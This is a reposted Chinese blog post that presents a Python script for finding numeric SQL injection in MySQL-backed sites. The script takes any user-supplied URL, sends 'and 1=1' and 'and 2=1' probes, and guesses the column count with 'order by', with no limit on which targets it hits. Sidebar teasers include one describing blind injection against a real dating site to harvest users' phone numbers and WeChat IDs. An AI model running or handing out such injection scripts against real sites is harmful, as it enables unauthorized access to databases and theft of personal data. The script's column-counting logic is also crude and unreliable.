python打造一个Mysql数字类型注入脚本(1)

最新推荐文章于 2024-04-30 21:19:09 发布
最新推荐文章于 2024-04-30 21:19:09 发布
阅读量281 收藏 1
点赞数
文章标签: 数据库 python
原文链接:http://www.cnblogs.com/haq5201314/p/8898626.html
版权

前言:

总是想写一个sql注入脚本,但是之前的那些都不行。

这次做好了准备,然后嘿嘿嘿。

准备:

sql注入的基础知识

熟悉怎么判断

正文:

思路概念图:

这里我没有限制用户输入,不限制的话可能会 @&#@*#&@* = =

代码:

import requests
from bs4 import BeautifulSoup
import time
import re
import sys
def user():
    wailtfor=input('请输入你要进行sql注入测试的url:')
    print('------开启第一重验证------')
    url="{}".format(wailtfor)
    headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}
    request=requests.get(url=url,headers=headers,timeout=6)
    if request.status_code != 200:
        print('[-]抱歉该url十分的不稳定,退出程序中......')
        time.sleep(1)
        sys.exit()
    else:
        print('[+]第一重验证已经完成,目标是稳定的')
        journal=open('journal.txt','w',encoding='utf-8')
        journal.write('{}是稳定的\n'.format(url))
        journal.write('下一步进行判断是否存在注入')
        journal.close()

    print('------开启第二重测试------')

    def ceshi():
        pay1 = '%20and%201=1'
        pay2 = '%20and%202=1'
        Testinjection1 = request.url + pay1
        Testinjection2=request.url+pay2
        print('-------尝试数字型注入------')
        print(Testinjection1)
        print(Testinjection2)
        Testg=requests.get(Testinjection1,headers=headers)
        print(Testg.headers)
        Testg2=requests.get(Testinjection2,headers=headers)
        print(Testg2.headers)
        if Testg.text != Testg2.text:
            print('[+]数字型注入成功,用到的payload:{},{}'.format(pay1, pay2))
            journal2 = open('journal.txt', 'a')
            journal2.write('数字型注入成功,用到的payload:{},{}'.format(pay1, pay2))
            journal2.close()
            print('------开始猜字段数------')
        elif Testg.headers != Testg2.headers:
            print('[+]数字型注入成功,用到的payload:{},{}'.format(pay1,pay2),'可能存在注入点')
            journal2=open('journal.txt','a')
            journal2.write('数字型注入成功,用到的payload:{},{}'.format(pay1,pay2))
            journal2.close()
            print('------开始猜字段数------')
        else:
            print('[-]数字型注入失败')
            print('[!]尝试字符型注入')
            sys.exit()
        a='ooo'
        for s in range(1,100):
            if a=='xxx':break
            orpay=url+'%20order%20by%20{}'.format(s)
            res=requests.get(orpay,headers=headers)
            ewe=res.content
            lk=re.finditer('mysql_fetch_array()',str(ewe))
            for p in lk:
                print(str(p))
                g='''<_sre.SRE_Match object; span=(232, 249), match='mysql_fetch_array'>'''
                if str(p) == g:
                    print('字段数payload:', res.url)
                    dw = int(res.url[-1:])-1
                    print(type(dw))
                    print('字段数长度为:', dw)
                    a='xxx'
                else:
                    print('字段数payload:',res.url)
                    dw=int(res.url[-1:])-1
                    print('字段数长度为:',dw)
                    a='xxx'




    ceshi()

user()

  测试结果如下:

 

 代码还有很多不足,诺各位大佬有什么好的意见请多多留言。 = =

最后送上一首歌:

转载于:https://www.cnblogs.com/haq5201314/p/8898626.html

weixin_30345055
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pymysql的使用,sql注入问题
Yydsaoligei的博客
08-18 795
pymysql的使用,sql注入问题, MySQL
python实现sql注入_python 打造一个sql注入脚本 (一)
weixin_39678103的博客
12-11 1826
0x00前言:昨天刚刚看完小迪老师的sql注入篇的第一章所以有了新的笔记。0x01笔记:sql注入原理:网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作。sql注入对渗透的作用:获取数据sql注入特性:攻击方法由数据库类型决定攻击结果由数据库决定漏洞代码:sql.php$id=$_GET['x'];$sql="select * from news where id=$x...
使用python操作mysql,,SQL注入问题, 视图, 触发器 ,事务(掌握重点), 存储过程,索引 问题
qq_38104453的博客
10-26 778
使用pymysql模块操作mysql, SQL注入问题, 视图, 触发器 ,事务(掌握重点), 存储过程,索引
python操作MySQL,SQL注入问题,视图,触发器,事务,存储过程,内置函数,流程控制,索引
m0_69962105的博客
10-26 197
视图就是通过查询得到一张虚拟表,然后保存下来,下次可以直接使用在满足对某张表数据的增,删,该的情况下,自动触发的功能称之为触发器开启一个事务可以包含一些SQL语句,这些SQL语句要么同时成功要么同时失败存储过程包含了一系列可执行的SQL语句,存储过程存放于MySQL中,通过调用他的名字可以执行它内部的一堆sql,类似python中的自定义函数索引是一种数据结构,也叫做"键",是存储引擎用于快速找到记录的一种数据结构索引有:primary key----------可以加快查询速度,还有约束作用。
2024年Python最全Python自动化sql注入:布尔盲注_布尔盲注脚本
最新发布
2301_82244514的博客
04-30 431
将payload与网址进行拼接,使用requests包来访问网站,根据返回页面是否有flag出现来确认是否成功。需要用到requests包来建立连接访问目标地址,根据回显特征进行下一步操作,这里正确标志是"You are in…获取数量(有多少张表)–> 获取每张表表名的长度 --> 获取具体的表名。
python使用mysql,防止SQL注入
帅的飞起的博客
04-24 785
python使用mysql防止SQL注入
Python MySQL注入
weixin_44602192的博客
05-18 259
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一 利用SQL “#” 的注释功能更改原SQL语句来实现 存在SQL注入问题的代码: #! /usr/bin/python3 # -*- encoding:utf8 -*- import pymysql import hashlib dbserver = input('输入服务器地址:') username = input('请输入用户帐号:
SQL住入原始脚本_SQL注入python脚本_
10-03
标题中的“SQL住入原始脚本”指的是利用SQL注入技术来编写或执行的原始SQL命令,而“SQL注入python脚本”则表明我们将探讨如何使用Python编写脚本来自动化这一过程。 SQL注入攻击主要有三种类型:直列注入、延时...
pythonMySQL 数据库进行增删改查的脚本
12-16
在例子中,`row_1 = cursor.fetchmany(10)`获取了最多10条记录,并将它们存储在一个列表中。 对于数据的插入,我们可以构建一个SQL插入语句,如: ```python sql = "insert into stu (id) VALUES ('%s')" % (s_id,...
simplesql:一个简单的用于mysqlpython客户端
06-30
"simplesql:一个简单的用于mysqlpython客户端" 指的是一个Python库,专门设计用于简化与MySQL数据库的交互。这个库可能是由开发者为数据库设计课程的期末项目而创建的,目的是提供一个轻量级且易于使用的工具,...
mysql.rar_MYSQL_python_python mysql_python数据库
09-21
首先,我们关注到“MySQLDB.py”,这通常是一个Python模块,它可能实现了PythonMySQL之间的连接和数据操作。MySQLDB是Python一个旧版库,用于连接MySQL数据库,它是Python DB-API(Database API Specification v...
基于python的sql注入脚本
03-04
适合刚学python和sql注入的人 import urllib2 import re
Python3.6实现连接mysql或mariadb的方法分析
09-09
现在,我们可以编写Python脚本来连接MySQL或MariaDB数据库。以下是一个简单的示例: ```python #!/usr/bin/python #coding=utf8 import pymysql # 配置数据库连接参数 host = 'localhost' # 数据库服务器地址 ...
mysql 布尔型盲注,SQL注入之布尔型注入(MySQL)
weixin_34138192的博客
03-17 344
0x00 特点当页面存在注入,但是没有显示位,且没有用echo "mysql_error()"输出错误信息时可以用,它一次只能猜测一个字节,速度慢,但是只要存在注入就能用0x01 利用方式用and连接前后语句:www.xxx.com/aa.php?id=1 and (注入语句) --+根据返回页面是否相同来得到数据0x02 注入步骤找到注入点,判断闭合字符尝试猜解列数,得到显示位得到数据库名最终得...
一个布尔盲注的脚本
weixin_35752645的博客
01-01 488
布尔盲注是一种数据库攻击技术,其目的是通过查询数据库并猜测结果来确定特定信息。布尔盲注的基本原理是,通过提交查询并猜测其真假,从而获取有关数据库中存储的信息的提示。 如果要写一个布尔盲注脚本,你需要以下步骤: 建立与数据库的连接。 编写 SQL 语句,并将其提交给数据库。 处理数据库的响应。如果响应为真,则可以推断出查询的条件是真的;如果响应为假,则可以推断出查询的条件是假的。 根据获得的信息,...
PYTHON操作MYSQL时防止SQL注入
热门推荐
pi9nc的专栏
12-28 1万+
PYTHON操作MYSQL时防止SQL注入 分类: MySQL2011-09-15 10:04 1024人阅读 评论(0) 收藏 举报 sqlpythonmysqlstringjavascriptquery 下面是网上搜到的一篇关于SQL注入的文章。最近在项目中涉及到防止SQL注入的部分,但是由于使用的是PYTHONMYSQL,使用不了JAVA代码中提供的一
python mysql盲注脚本
夜班机器人的博客
07-26 2525
某相亲网漏洞,可盲注获得手机号和微信号。 功能1:爬取所有女性ID、年龄、月薪、照片URL 功能2:通过盲注方式获取对应ID的手机号和微信号 功能3:所有数据自动导入MYSQL 缺点:单线程
python 打造一个sql注入脚本 (一)
weixin_30577801的博客
03-18 1310
0x00前言: 昨天刚刚看完小迪老师的sql注入篇的第一章 所以有了新的笔记。 0x01笔记: sql注入原理: 网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作。 sql注入对渗透的作用: 获取数据 sql注入特性: 攻击方法由数据库类型决定 攻击结果由数据库决定 漏洞代码: sql.php <?php $id=$_GE...
Python连接Mysql数据库SQL注入问题的解决
KK_2018的技术博客_程序员不止是程序员
01-25 446
pymysql自带解决sql注入问题的方法 ''' sql注入问题的解决 pymysql自带解决sql注入问题的方法 ''' import pymysql connect_db=pymysql.connect(host='localhost',port=3306,user='root',password='root',charset='utf8',database='jing_dong') cur=connect_db.cursor() select_id=input('请输入要查询的id:') #
如何用python写sql注入脚本
02-21
编写SQL注入脚本的步骤可以概括如下:1. 了解SQL注入攻击原理; 2. 建立数据库连接; 3. 获得用户输入; 4. 构建恶意SQL语句; 5. 执行语句; 6. 获取返回结果。使用Python编写SQL注入脚本需要使用MySQLdb模块,它可以实现对MySQL数据库的操作,比如数据库连接、执行SQL语句等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值